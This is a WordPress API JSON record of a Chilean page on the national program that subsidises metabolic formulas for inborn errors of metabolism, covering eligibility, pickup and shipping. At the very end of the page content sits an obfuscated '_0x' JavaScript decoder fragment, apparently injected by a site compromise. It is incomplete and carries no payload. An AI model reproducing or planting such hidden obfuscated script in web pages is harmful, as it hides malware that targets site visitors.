{"id":38,"date":"2020-02-11T22:02:55","date_gmt":"2020-02-12T01:02:55","guid":{"rendered":"http:\/\/metabolicaschile.cl\/new-site\/?page_id=38"},"modified":"2022-05-15T23:47:13","modified_gmt":"2022-05-16T03:47:13","slug":"formulas-metabolicas","status":"publish","type":"page","link":"https:\/\/metabolicaschile.cl\/new-site\/formulas-metabolicas\/","title":{"rendered":"F\u00f3rmulas metab\u00f3licas"},"content":{"rendered":"\n<p class=\"text-justify\">El Programa Nacional de alimentaci\u00f3n complementaria para errores innatos del metabolismo (PNAC-EIM) , es un subprograma del Ministerio de Salud, que subvenciona las f\u00f3rmulas especiales para 10 patolog\u00edas metab\u00f3licas. Las f\u00f3rmulas son prescritas y distribuidas por INTA, como centro de referencia nacional para estas patolog\u00edas.<\/p>\n\n\n\n<p>El acceso a la f\u00f3rmula especial es Universal y de por vida, y actualmente abarca las siguientes condiciones:<\/p>\n\n\n\n<ul><li>Fenilcetonuria (PKU)<\/li><li>Enfermedad de orina olor a jarabe de arce ( MSUD )<\/li><li>D\u00e9ficit de trasportador cerebral de glucosa (Glut\u00a01)<\/li><li>Aciduria Glut\u00e1rica tipo I ( AG1)<\/li><li>Tirosinemia (TYR)<\/li><li>Acidurias org\u00e1nicas ( propi\u00f3nica y Metilmal\u00f3nica )<\/li><li>Acidemia Isoval\u00e9rica (AIV)<\/li><li>Defectos del ciclo de la Urea (ACU)<\/li><li>Defectos de betaoxidaci\u00f3n de \u00e1cidos grasos<\/li><li>Homocisteinuria<\/li><\/ul>\n\n\n\n<p><strong>\u00bfQui\u00e9nes pueden recibir el beneficio?<\/strong><\/p>\n\n\n\n<p class=\"text-justify\">El \u00fanico requisito para acceder al programa es presentar documento con confirmaci\u00f3n diagn\u00f3stica de alguna de las patolog\u00edas adscritas. El Diagn\u00f3stico debe ser realizado mediante estudio Gen\u00e9tico y\/o bioqu\u00edmico por un m\u00e9dico especializado. El documento debe ser entregado de manera presencial en INTA, o enviado v\u00eda correo electr\u00f3nico a: <a href=\"mailto:felipe.penaloza@inta.uchile.cl\">felipe.penaloza@inta.uchile.cl<\/a> o <a href=\"mailto:marcela.jara@inta.uchile.cl\">marcela.jara@inta.uchile.cl<\/a><\/p>\n\n\n\n<p><strong>Una vez diagnosticado, \u00bfc\u00f3mo puedo acceder al beneficio?<\/strong><\/p>\n\n\n\n<p class=\"text-justify\">Una vez ingresado al programa, puede retirar los productos de manera presencial en INTA, ubicado en Av el L\u00edbano 5524, Macul, Santiago. Los d\u00edas Lunes, mi\u00e9rcoles y jueves de 9.00 a 13:00 hrs.<\/p>\n\n\n\n<p class=\"text-justify\">Para pacientes de regiones se pueden realizar env\u00edos de f\u00f3rmulas a trav\u00e9s de las diferentes empresas de mensajer\u00eda, para ello debe enviar un correo electr\u00f3nico a: <a href=\"mailto:pedidosformulas@gmail.com\">pedidosformulas@gmail.com<\/a>, indicando;<\/p>\n\n\n\n<ul><li>Nombre del paciente<\/li><li>RUT del paciente<\/li><li>Edad del paciente<\/li><li>Nombre completo del destinatario (persona que lo retira)<\/li><li>RUT del destinatario<\/li><li>Lugar de recepci\u00f3n (Datos del Domicilio* o sucursal de Starken, Chilexpress o Correos de Chle)<\/li><li>Tel\u00e9fono de contacto<\/li><\/ul>\n\n\n\n<p><strong>* Los env\u00edos a Domicilio solo se pueden realizar a trav\u00e9s de la empresa Stareken.<\/strong><\/p>\n\n\n\n<p class=\"text-justify\"><strong>** El programa Ministerial financia la f\u00f3rmula pero no el env\u00edo, por lo que el costo del env\u00edo debe ser asumido por la familia<\/strong>.<\/p>\n\n\n\n<p>Cualquier consulta respecto al programa por favor escribir a :<\/p>\n\n\n\n<p><a href=\"mailto:felipe.penaloza@inta.uchile.cl\">felipe.penaloza@inta.uchile.cl<\/a><\/p>\n\n\n\n<p><a href=\"mailto:marcela.jara@inta.uchile.cl\">marcela.jara@inta.uchile.cl<\/a><\/p>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\r\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script>","protected":false},"excerpt":{"rendered":"<p>El Programa Nacional de alimentaci\u00f3n complementaria para errores innatos del metabolismo (PNAC-EIM) , es un subprograma del Ministerio de Salud, que subvenciona las f\u00f3rmulas especiales para 10 patolog\u00edas metab\u00f3licas. Las f\u00f3rmulas son prescritas y distribuidas por INTA, como centro de referencia nacional para estas patolog\u00edas. El acceso a la f\u00f3rmula [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":826,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/pages\/38"}],"collection":[{"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/comments?post=38"}],"version-history":[{"count":8,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/pages\/38\/revisions"}],"predecessor-version":[{"id":883,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/pages\/38\/revisions\/883"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/media\/826"}],"wp:attachment":[{"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/media?parent=38"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}